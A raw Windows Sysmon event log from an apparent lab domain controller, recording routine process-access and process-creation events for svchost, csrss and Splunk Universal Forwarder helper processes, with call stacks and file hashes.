15:59:14.575{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007156Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:14.575{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007155Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:14.575{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007154Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:14.575{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007153Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:14.575{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007152Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:14.575{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007151Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:14.575{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007150Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:14.575{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007149Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:14.575{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007148Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:14.575{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7E52-5FA1-9101-000000008801}2012C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007147Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:14.575{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7E52-5FA1-9101-000000008801}2012C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007146Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:14.576{D28789B6-7E52-5FA1-9101-000000008801}2012C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007173Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:15.372{D28789B6-7E53-5FA1-9201-000000008801}26003160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007172Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:15.231{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7E53-5FA1-9201-000000008801}2600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007171Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:15.231{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007170Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:15.231{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007169Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:15.231{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007168Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:15.231{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007167Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:15.231{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007166Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:15.231{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007165Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:15.231{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007164Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:15.231{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007163Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:15.231{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007162Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:15.231{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7E53-5FA1-9201-000000008801}2600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007161Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:15.231{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7E53-5FA1-9201-000000008801}2600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007160Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:15.233{D28789B6-7E53-5FA1-9201-000000008801}2600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007186Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:16.372{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7E54-5FA1-9301-000000008801}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 